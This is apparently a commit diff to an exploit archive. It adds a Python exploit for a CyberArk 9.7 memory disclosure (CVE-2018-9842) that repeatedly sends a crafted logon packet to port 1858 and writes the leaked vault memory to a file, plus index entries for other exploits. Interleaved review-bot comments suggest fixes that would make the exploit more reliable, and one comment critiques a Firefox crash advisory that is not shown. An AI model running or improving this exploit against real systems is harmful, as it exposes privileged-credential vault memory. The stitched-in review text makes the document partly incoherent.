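Review bot: The explanation says the zero-length chunk should be followed by `\r\n`, but the served file `fireforcrash.txt` uses bare LF line endings as shown, and RFC 7230 requires CRLF chunk framing; the advisory should state whether the crash reproduces with compliant CRLF framing or only with this lenient LF parsing, since that determines how realistic the trigger is. The bytes after the `0` chunk are the position where a trailer section would appear, and `foobar` is not a `name: value` trailer, so the trigger appears to be malformed-trailer handling rather than "data after the end" in general; saying so would make the report precise. Step 4 requires closing netcat, and the response also carries `Content-disposition: attachment`, so the crash may depend on the download path and connection teardown; the steps should say at which point the crash is observed. Typos: "browe", "obserev", and the file is called both `firefoxcrash.txt` and `fireforcrash.txt`.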
@@ -0,0 +1,55 @@ +# Exploit Title: CyberArk 9.7 - Memory Disclosure +# Date: 2018-06-04 +# Exploit Author: Thomas Zuk (@Freakazoidile) +# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/ +# Version: < 9.7 and < 10 +# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10 +# CVE: CVE-2018-9842 + +# Description: There currently exists a general advisory for the CVE with a description of exploitation and how +# to reproduce, but without full exploit code. I have developed a working, reliable standalone Python exploit that +# can be successfully used by modifying only the target IP address. Attached to this email submission is the working exploit code. + +#!/usr/bin/python + +import socket +import os +import sys + +# Exploit script for CVE-2018-9842 +# Original vulnerability advisory: https://www.redteam-pentesting.de/advisories/rt-sa-2017-015 +# Author: Thomas Zuk (@Freakazoidile) - Security Consultant @ Packetlabs ltd. + +# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd +# paste the following bytes into a hexedited file named logon.bin: +#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 +# +# + +ip = "10.107.32.21" +port = 1858 + +# Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services. 
+# The below is a sample login request that is needed to receive the memory + +pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00" + + +for iteration in range(0, 110): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((ip, port)) + s.send(pacli_logon) + + # recieve response + s.recv(200) + reply = s.recv(1500) + + # write responses to file + file = open("cyberark_memory", "a") + + file.write("received: \n") + file.write(reply) + file.write("\n\n\n") + file.close() + + s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e6a134bfc..36e7b844e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
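Review bot: The script is Python 2 only even though the header says it runs by changing the IP: `pacli_logon` is a text literal, so `s.send(pacli_logon)` raises TypeError on Python 3 and `file.write(reply)` writes bytes to a text-mode file; prefix the literal with `b` and open the output with `"ab"`. Each iteration does a single `s.recv(200)` to skip the header and a single `s.recv(1500)` for the leaked data, but TCP may deliver fewer bytes per call and the socket has no timeout, so a vault that does not answer hangs the loop forever; add `s.settimeout(5)` and read until the peer closes. The output file should be managed with `with open("cyberark_memory", "ab") as out:` rather than reopened per iteration, and `ip` should come from `sys.argv` as the header promises. The manual-test comment refers to hex bytes to paste into logon.bin, but they are not present in this listing, and `# Version: < 9.7 and < 10` is ambiguous since the second bound subsumes the first; spell out the exact fixed builds.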
@@ -6202,6 +6202,8 @@ id,file,description,date,author,type,platform,port 45919,exploits/linux/dos/45919.c,"Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer",2018-11-30,"Jinbum Park",dos,linux, 45923,exploits/windows/dos/45923.html,"VBScript - 'OLEAUT32!VariantClear' and 'scrrun!VBADictionary::put_Item' Use-After-Free",2018-11-30,"Google Security Research",dos,windows, 45924,exploits/windows/dos/45924.html,"VBScript - 'rtFilter' Out-of-Bounds Read",2018-11-30,"Google Security Research",dos,windows, +45931,exploits/windows/dos/45931.txt,"Mozilla Firefox 63.0.1 - Denial of Service (PoC)",2018-12-03,"SAIKUMAR CHEBROLU",dos,windows, +45934,exploits/linux/dos/45934.txt,"Budabot 4.0 - Denial of Service (PoC)",2018-12-03,"Ryan Delaney",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -16984,6 +16986,7 @@ id,file,description,date,author,type,platform,port 45914,exploits/linux/remote/45914.rb,"PHP imap_open - Remote Code Execution (Metasploit)",2018-11-29,Metasploit,remote,linux, 45917,exploits/multiple/remote/45917.rb,"TeamCity Agent - XML-RPC Command Execution (Metasploit)",2018-11-29,Metasploit,remote,multiple, 45925,exploits/java/remote/45925.rb,"Apache Spark - Unauthenticated Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066 +45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 
@@ -40426,3 +40429,10 @@ id,file,description,date,author,type,platform,port 45904,exploits/hardware/webapps/45904.txt,"Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal",2018-11-26,"numan türle",webapps,hardware,80 45918,exploits/hardware/webapps/45918.py,"Schneider Electric PLC - Session Calculation Authentication Bypass",2018-11-30,Photubias,webapps,hardware,80 45920,exploits/cgi/webapps/45920.txt,"Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass",2018-11-30,LiquidWorm,webapps,cgi,80 +45927,exploits/php/webapps/45927.py,"Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution",2018-12-03,AkkuS,webapps,php,80 +45928,exploits/hardware/webapps/45928.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting",2018-12-03,Luca.Chiou,webapps,hardware,80 +45929,exploits/linux/webapps/45929.py,"PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure",2018-12-03,ParagonSec,webapps,linux,80 +45930,exploits/php/webapps/45930.pl,"Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection",2018-12-03,"Ihsan Sencan",webapps,php,80 +45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80 +45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux, +45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80